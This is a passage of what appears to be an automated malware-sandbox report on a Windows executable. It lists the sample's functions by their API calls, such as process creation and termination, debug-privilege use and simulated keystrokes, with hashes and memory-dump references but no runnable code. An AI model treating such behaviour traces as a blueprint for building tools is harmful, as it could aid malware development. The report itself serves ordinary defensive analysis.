                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                • String ID:
                                                • API String ID: 560350794-0
                                                • Opcode ID: 9ac218020f9de36117323ac204406b8e3d1d2c2c75ff43d676f6d3af42edde52
                                                • Instruction ID: 4dd59e867c60cf6fa60bc5efd18c7aa21244d51ac8df22f7ae4755afcf1f10dd
                                                • Opcode Fuzzy Hash: 9ac218020f9de36117323ac204406b8e3d1d2c2c75ff43d676f6d3af42edde52
                                                • Instruction Fuzzy Hash: E6F15D71A01209EFCF04DF95C888EAEB7BAFF49315F108099F919AB250DB35AE45CB51
                                                APIs
                                                • _memset.LIBCMT ref: 007EF7C9
                                                • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 007EF95C
                                                • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 007EF980
                                                • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 007EF9C0
                                                • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 007EF9E2
                                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 007EFB5E
                                                • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 007EFB90
                                                • CloseHandle.KERNEL32(?), ref: 007EFBBF
                                                • CloseHandle.KERNEL32(?), ref: 007EFC36
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                • String ID:
                                                • API String ID: 4090791747-0
                                                • Opcode ID: bd72af33fd4a4e7f9a1472bedc07a7c35eef71cfcf752616dc3f2679b5cbeeaa
                                                • Instruction ID: f7ca8aa6216a94e61ad0306dbad03b82fe37afd5205c90014bac480b313b70a0
                                                • Opcode Fuzzy Hash: bd72af33fd4a4e7f9a1472bedc07a7c35eef71cfcf752616dc3f2679b5cbeeaa
                                                • Instruction Fuzzy Hash: 06E1C031205341DFCB14EF25C885B6ABBE5AF88354F14846DF9899B3A2DB38EC41CB52
                                                APIs
                                                  • Part of subcall function 007D46AF: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,007D36DB,?), ref: 007D46CC
                                                  • Part of subcall function 007D46AF: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,007D36DB,?), ref: 007D46E5
                                                  • Part of subcall function 007D4AD8: GetFileAttributesW.KERNEL32(?,007D374F), ref: 007D4AD9
                                                • lstrcmpiW.KERNEL32(?,?), ref: 007D4DE7
                                                • _wcscmp.LIBCMT ref: 007D4E01
                                                • MoveFileW.KERNEL32(?,?), ref: 007D4E1C
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                • String ID:
                                                • API String ID: 793581249-0
                                                • Opcode ID: 0bafd056ec81b133358b3b2c728aae1fb99f9b2fc989a00e8edc2cdb6c7738bb
                                                • Instruction ID: 8217572f056fafa5fbe7fce61eb90e894b4a0c659172b609606645e390fb0b75
                                                • Opcode Fuzzy Hash: 0bafd056ec81b133358b3b2c728aae1fb99f9b2fc989a00e8edc2cdb6c7738bb
                                                • Instruction Fuzzy Hash: E35144B2408784ABC724EB90D8859DFB7FCAF85340F14492FF68993251EF38A5498756
                                                APIs
                                                • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 007F8731
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: InvalidateRect
                                                • String ID:
                                                • API String ID: 634782764-0
                                                • Opcode ID: dd73c57e68f8f1484bebb1f0c692200374e06649f23562f07b67d078089ed723
                                                • Instruction ID: 0119c3e9fe85d6508851f63424240ba0f16ea4dd5bdce4f9f06fd11100b7cf66
                                                • Opcode Fuzzy Hash: dd73c57e68f8f1484bebb1f0c692200374e06649f23562f07b67d078089ed723
                                                • Instruction Fuzzy Hash: 4B51B170610208FAEF609B69CC89BB93B64FB05360F604515FB15E63E2CF79E990DB52
                                                APIs
                                                • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 007AC477
                                                • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 007AC499
                                                • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 007AC4B1
                                                • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 007AC4CF
                                                • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 007AC4F0
                                                • DestroyIcon.USER32(00000000), ref: 007AC4FF
                                                • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 007AC51C
                                                • DestroyIcon.USER32(?), ref: 007AC52B
                                                  • Part of subcall function 007FA4E1: DeleteObject.GDI32(00000000), ref: 007FA51A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                                • String ID:
                                                • API String ID: 2819616528-0
                                                • Opcode ID: fa33ae8c29b9d6d8e0ce1e6d0dde209542b47c662083cdfd551b3f4a89031c7f
                                                • Instruction ID: fe35bfdbab98da90232bca4a677cd87fa12b0bf6d6880a6358641740a3fde51c
                                                • Opcode Fuzzy Hash: fa33ae8c29b9d6d8e0ce1e6d0dde209542b47c662083cdfd551b3f4a89031c7f
                                                • Instruction Fuzzy Hash: 2B517A70A00209EFDF21DF24CC45BBA3BA5FF58350F108628F916972A1DB78AD91DB64
                                                APIs
                                                  • Part of subcall function 007CAC37: GetWindowThreadProcessId.USER32(?,00000000), ref: 007CAC57
                                                  • Part of subcall function 007CAC37: GetCurrentThreadId.KERNEL32 ref: 007CAC5E
                                                  • Part of subcall function 007CAC37: AttachThreadInput.USER32(00000000,?,007C9945,?,00000001), ref: 007CAC65
                                                • MapVirtualKeyW.USER32(00000025,00000000), ref: 007C9950
                                                • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 007C996D
                                                • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 007C9970
                                                • MapVirtualKeyW.USER32(00000025,00000000), ref: 007C9979
                                                • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 007C9997
                                                • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 007C999A
                                                • MapVirtualKeyW.USER32(00000025,00000000), ref: 007C99A3
                                                • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 007C99BA
                                                • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 007C99BD
                                                Similarity
                                                • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                • String ID:
                                                • API String ID: 2014098862-0
                                                • Opcode ID: 476a8f991cc2744cc94ff0136d0098198a9fb1a0a36fc65c986f69cfc67894b7
                                                • Instruction ID: 0894aaaaf430fee845cdcc69c0f73d7a7cf657c62b67fe2642c85884bdce2064
                                                • Opcode Fuzzy Hash: 476a8f991cc2744cc94ff0136d0098198a9fb1a0a36fc65c986f69cfc67894b7
                                                • Instruction Fuzzy Hash: 3A11CE71950218FEF7206B60CC8DFAA7B2DEF4C755F104429F644AB1A0CDFA6C10DAA8
                                                APIs
                                                • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,007C8864,00000B00,?,?), ref: 007C8BEC
                                                • HeapAlloc.KERNEL32(00000000,?,007C8864,00000B00,?,?), ref: 007C8BF3
                                                • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,007C8864,00000B00,?,?), ref: 007C8C08
                                                • GetCurrentProcess.KERNEL32(?,00000000,?,007C8864,00000B00,?,?), ref: 007C8C10
                                                • DuplicateHandle.KERNEL32(00000000,?,007C8864,00000B00,?,?), ref: 007C8C13
                                                • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,007C8864,00000B00,?,?), ref: 007C8C23
                                                • GetCurrentProcess.KERNEL32(007C8864,00000000,?,007C8864,00000B00,?,?), ref: 007C8C2B
                                                • DuplicateHandle.KERNEL32(00000000,?,007C8864,00000B00,?,?), ref: 007C8C2E
                                                • CreateThread.KERNEL32(00000000,00000000,007C8C54,00000000,00000000,00000000), ref: 007C8C48
                                                Similarity
                                                • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                • String ID:
                                                • API String ID: 1957940570-0
                                                • Opcode ID: 64ce08f6ef4f2c64b93c63c0229cb3fec947965c31de5e0e6e382ede4747ed79
                                                • Instruction ID: e9b96fa706caad9c9cb9fcc8fbdca064973e52a0647753443b1489dae6da3f82
                                                • Opcode Fuzzy Hash: 64ce08f6ef4f2c64b93c63c0229cb3fec947965c31de5e0e6e382ede4747ed79
                                                • Instruction Fuzzy Hash: 9B01ACB5240348FFE610AB65DC89F6B3B6CEF89711F008421FA05DB291CA749810DA24
                                                Similarity
                                                • API ID:
                                                • String ID: NULL Pointer assignment$Not an Object type
                                                • API String ID: 0-572801152
                                                • Opcode ID: 6b2179a7ee7e39a7b0003b9df5acc1133c317f043e000ea7a3f4c96ad09fef2d
                                                • Instruction ID: 797bd7a0d1cbdd29e5120c68d30d1ba500a923bde5d10161278572f762dec35d
                                                • Opcode Fuzzy Hash: 6b2179a7ee7e39a7b0003b9df5acc1133c317f043e000ea7a3f4c96ad09fef2d
                                                • Instruction Fuzzy Hash: 7CC19172A01259AFDF10DFA9C884BEEB7B5FF48314F148429EA15E7280E7789D41CB60
                                                Similarity
                                                • API ID: Variant$ClearInit$_memset
                                                • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                • API String ID: 2862541840-625585964
                                                • Opcode ID: 13549b7c86f398a020bec23ea36678570b5b1730a09fce6296643d7d618e1a65
                                                • Instruction ID: bd092cc6bab40026e139807d43f76d8810696ba66896650be1449639ca4add07
                                                • Opcode Fuzzy Hash: 13549b7c86f398a020bec23ea36678570b5b1730a09fce6296643d7d618e1a65
                                                • Instruction Fuzzy Hash: E891B172A01255EBDF20DFA6C848FAFB7B8EF49310F108559F615AB280D7789945CBA0
                                                APIs
                                                  • Part of subcall function 007C7432: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,007C736C,80070057,?,?,?,007C777D), ref: 007C744F
                                                  • Part of subcall function 007C7432: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,007C736C,80070057,?,?), ref: 007C746A
                                                  • Part of subcall function 007C7432: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,007C736C,80070057,?,?), ref: 007C7478
                                                  • Part of subcall function 007C7432: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,007C736C,80070057,?), ref: 007C7488
                                                • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 007E991B
                                                • _memset.LIBCMT ref: 007E9928
                                                • _memset.LIBCMT ref: 007E9A6B
                                                • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 007E9A97
                                                • CoTaskMemFree.OLE32(?), ref: 007E9AA2
                                                Strings
                                                • NULL Pointer assignment, xrefs: 007E9AF0
                                                Similarity
                                                • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                • String ID: NULL Pointer assignment
                                                • API String ID: 1300414916-2785691316
                                                • Opcode ID: b5ae0f9ad9ca56b584fc5ded2bef42da9c7a52b5d5bfbf1fca7d221d4637eecb
                                                • Instruction ID: cc5f7c793765bf18d0ac58ed7c07170e6de366321ea93a8bdf0dc5753361e8d1
                                                • Opcode Fuzzy Hash: b5ae0f9ad9ca56b584fc5ded2bef42da9c7a52b5d5bfbf1fca7d221d4637eecb
                                                • Instruction Fuzzy Hash: 47912872D01218EBDF10DFA5DC85ADEBBB9EF08750F10816AF519A7241DB749A44CFA0
                                                APIs
                                                • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 007F6E56
                                                • SendMessageW.USER32(?,00001036,00000000,?), ref: 007F6E6A
                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 007F6E84
                                                • _wcscat.LIBCMT ref: 007F6EDF
                                                • SendMessageW.USER32(?,00001057,00000000,?), ref: 007F6EF6
                                                • SendMessageW.USER32(?,00001061,?,0000000F), ref: 007F6F24
                                                Similarity
                                                • API ID: MessageSend$Window_wcscat
                                                • String ID: SysListView32
                                                • API String ID: 307300125-78025650
                                                • Opcode ID: 0d16c029443fd035349a85c650868b4591141f2eb7275f22ed5f37af9d00372b
                                                • Instruction ID: ea015cb855274c265b55defd1970399aab71cfd897392adcd5ee8c4a98918ee0
                                                • Opcode Fuzzy Hash: 0d16c029443fd035349a85c650868b4591141f2eb7275f22ed5f37af9d00372b
                                                • Instruction Fuzzy Hash: A5419D75A00208EBEF219F64CC89BFA77F8EF08350F10446AF644E7291D6799D84CB64
                                                APIs
                                                  • Part of subcall function 007D3C99: CreateToolhelp32Snapshot.KERNEL32 ref: 007D3CBE
                                                  • Part of subcall function 007D3C99: Process32FirstW.KERNEL32(00000000,?), ref: 007D3CCC
                                                  • Part of subcall function 007D3C99: CloseHandle.KERNEL32(00000000), ref: 007D3D96
                                                • OpenProcess.KERNEL32(00000001,00000000,?), ref: 007EEAB8
                                                • GetLastError.KERNEL32 ref: 007EEACB
                                                • OpenProcess.KERNEL32(00000001,00000000,?), ref: 007EEAFA
                                                • TerminateProcess.KERNEL32(00000000,00000000), ref: 007EEB77
                                                • GetLastError.KERNEL32(00000000), ref: 007EEB82
                                                • CloseHandle.KERNEL32(00000000), ref: 007EEBB7
                                                Similarity
                                                • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                • String ID: SeDebugPrivilege
                                                • API String ID: 2533919879-2896544425
                                                • Opcode ID: be2668fff5ce6dacb970b687e2c5d2be908f3fc4f5d14e50029f643da14345ae
                                                • Instruction ID: 014d2ebc86e070dad06ccae65208bd60c849f110653aafb13b72d81d8b0cdee4
                                                • Opcode Fuzzy Hash: be2668fff5ce6dacb970b687e2c5d2be908f3fc4f5d14e50029f643da14345ae
                                                • Instruction Fuzzy Hash: 3D418B71201201DFDB14EF15CC99F6DB7A5AF84714F08846DFA469B3D2DB78A804CB96
                                                APIs
                                                • LoadIconW.USER32(00000000,00007F03), ref: 007D30CD
                                                Similarity
                                                • API ID: IconLoad
                                                • String ID: blank$info$question$stop$warning
                                                • API String ID: 2457776203-404129466
                                                • Opcode ID: 65f1f6002ecc6088cfc52d7c299ecc54e245bf9a9ce0a112d3aea80ef186e3bd
                                                • Instruction ID: a102e381d7dfc42d9b8f2db7acf2e67c5bbe9ec90ccc34163ab52413d8923798
                                                • Opcode Fuzzy Hash: 65f1f6002ecc6088cfc52d7c299ecc54e245bf9a9ce0a112d3aea80ef186e3bd
                                                • Instruction Fuzzy Hash: 9D110D35609357FAEB205B58EC82D7A77BDDF05360F10402BF50596381DEBD5F4085A6
                                                APIs
                                                • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 007D4353
                                                • LoadStringW.USER32(00000000), ref: 007D435A
                                                • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 007D4370
                                                • LoadStringW.USER32(00000000), ref: 007D4377
                                                • _wprintf.LIBCMT ref: 007D439D
                                                • MessageBoxW.USER32(00000000,?,?,00011010), ref: 007D43BB
                                                Strings
                                                • %s (%d) : ==> %s: %s %s, xrefs: 007D4398
                                                Similarity
                                                • API ID: HandleLoadModuleString$Message_wprintf
                                                • String ID: %s (%d) : ==> %s: %s %s
                                                • API String ID: 3648134473-3128320259
                                                • Opcode ID: 658b30f13582243230f1ef81489ff73a5cc25e52f80e29a5c21572c48e95eef5
                                                • Instruction ID: a2ea211946ef8a577954153bd208fdd9f5970d600f1ac96c117177880536e1e7
                                                • Opcode Fuzzy Hash: 658b30f13582243230f1ef81489ff73a5cc25e52f80e29a5c21572c48e95eef5
                                                • Instruction Fuzzy Hash: CB0162F290020CBFEB119BA4DD89EF6776CDB08301F0045A6F705E2151EE789E858B79
                                                APIs
                                                  • Part of subcall function 00772612: GetWindowLongW.USER32(?,000000EB), ref: 00772623
                                                • GetSystemMetrics.USER32(0000000F), ref: 007FD4E6
                                                • GetSystemMetrics.USER32(0000000F), ref: 007FD506
                                                • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 007FD741
                                                • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 007FD75F
                                                • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 007FD780
                                                • ShowWindow.USER32(00000003,00000000), ref: 007FD79F
                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 007FD7C4
                                                • DefDlgProcW.USER32(?,00000005,?,?), ref: 007FD7E7
                                                Similarity
                                                • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                • String ID:
                                                • API String ID: 1211466189-0
                                                • Opcode ID: 5add6150753d9f8264302cf8e488f6264933c6b811da987d71602dace6e1d6cc
                                                • Instruction ID: c4b80d6eb5e17545930ffb41b06cecbf9e23071a9e43b2c93ac916de22735249
                                                • Opcode Fuzzy Hash: 5add6150753d9f8264302cf8e488f6264933c6b811da987d71602dace6e1d6cc
                                                • Instruction Fuzzy Hash: B7B16A75500219EBDF24DF68C9857BE7BB2BF04711F088069EE489F295DB38AD50CB60
                                                APIs
                                                • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,007AC347,00000004,00000000,00000000,00000000), ref: 00772ACF
                                                • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,007AC347,00000004,00000000,00000000,00000000,000000FF), ref: 00772B17
                                                • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,007AC347,00000004,00000000,00000000,00000000), ref: 007AC39A
                                                • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,007AC347,00000004,00000000,00000000,00000000), ref: 007AC406
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: ShowWindow
                                                • String ID:
                                                • API String ID: 1268545403-0
                                                • Opcode ID: f6c4655b0ad08d91074eac3e49be03358bbbe00181ee30481d05535ffd387c0f
                                                • Instruction ID: 793a803fbed04952f9f78e5264c2ea09096ac19289cd2329e89acb60a4896d54
                                                • Opcode Fuzzy Hash: f6c4655b0ad08d91074eac3e49be03358bbbe00181ee30481d05535ffd387c0f
                                                • Instruction Fuzzy Hash: E8411B30604780BACF368B28CC8DB7B7B91BF85350F5AC919E46F86562CA7D9843D711
                                                APIs
                                                • InterlockedExchange.KERNEL32(?,000001F5), ref: 007D7186
                                                  • Part of subcall function 00790F36: std::exception::exception.LIBCMT ref: 00790F6C
                                                  • Part of subcall function 00790F36: __CxxThrowException@8.LIBCMT ref: 00790F81
                                                • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 007D71BD
                                                • EnterCriticalSection.KERNEL32(?), ref: 007D71D9
                                                • _memmove.LIBCMT ref: 007D7227
                                                • _memmove.LIBCMT ref: 007D7244
                                                • LeaveCriticalSection.KERNEL32(?), ref: 007D7253
                                                • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 007D7268
                                                • InterlockedExchange.KERNEL32(?,000001F6), ref: 007D7287
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                • String ID:
                                                • API String ID: 256516436-0
                                                • Opcode ID: 6b5380d8619744a505c587cd03825b9cc47e418a13ac9f82b3e05c77d3dccd7a
                                                • Instruction ID: cdeb22756d23d5c7e0fd6ffc05d5035d3ebab2005bb4c3f6c598eae37d0ebe45
                                                • Opcode Fuzzy Hash: 6b5380d8619744a505c587cd03825b9cc47e418a13ac9f82b3e05c77d3dccd7a
                                                • Instruction Fuzzy Hash: 55319272900205EFCF14DF54DC89AAEB779FF45710F1481A5F904AB246DB34AE11CBA4
                                                APIs
                                                • DeleteObject.GDI32(00000000), ref: 007F621D
                                                • GetDC.USER32(00000000), ref: 007F6225
                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 007F6230
                                                • ReleaseDC.USER32(00000000,00000000), ref: 007F623C
                                                • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 007F6278
                                                • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 007F6289
                                                • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,007F905C,?,?,000000FF,00000000,?,000000FF,?), ref: 007F62C3
                                                • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 007F62E3
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                • String ID:
                                                • API String ID: 3864802216-0
                                                • Opcode ID: 063b5d5d37c0fe22be8c2566f29f120d9a0c2f3f6e7739e7743657e2194a3285
                                                • Instruction ID: 8395138c0f85038ecee36db42af43a696632ea374fb2fd1fed91c2b49685ab59
                                                • Opcode Fuzzy Hash: 063b5d5d37c0fe22be8c2566f29f120d9a0c2f3f6e7739e7743657e2194a3285
                                                • Instruction Fuzzy Hash: CF314F76201114BFEB114F54DC89FFA3BA9FF09761F044065FE08DA291CA799841CB68
                                                APIs
                                                  • Part of subcall function 00779997: __itow.LIBCMT ref: 007799C2
                                                  • Part of subcall function 00779997: __swprintf.LIBCMT ref: 00779A0C
                                                  • Part of subcall function 0078FE06: _wcscpy.LIBCMT ref: 0078FE29
                                                • _wcstok.LIBCMT ref: 007DED20
                                                • _wcscpy.LIBCMT ref: 007DEDAF
                                                • _memset.LIBCMT ref: 007DEDE2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                • String ID: X
                                                • API String ID: 774024439-3081909835
                                                • Opcode ID: b2b55f91324277dc972a288a5d2ecdb1e397f7c8627f198b5e18f57ee88c29d9
                                                • Instruction ID: 7bbcea0b625a37869729ca249c1ac93feeec270c3138ea5e1fc76ee2d663797b
                                                • Opcode Fuzzy Hash: b2b55f91324277dc972a288a5d2ecdb1e397f7c8627f198b5e18f57ee88c29d9
                                                • Instruction Fuzzy Hash: F8C15D71608300DFCB25EF24C885A5AB7F4BF84350F14892DF5999B3A2DB78E945CB92
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d134b74e6ee0d46b2a5fb4f6f11a6444e8d3e8f3c2aa0be94eca7f8b20a85a78
                                                • Instruction ID: 1bd8b951238b2361730b4c530ba01707ffb397de9370a2319e8237bcc8121c46
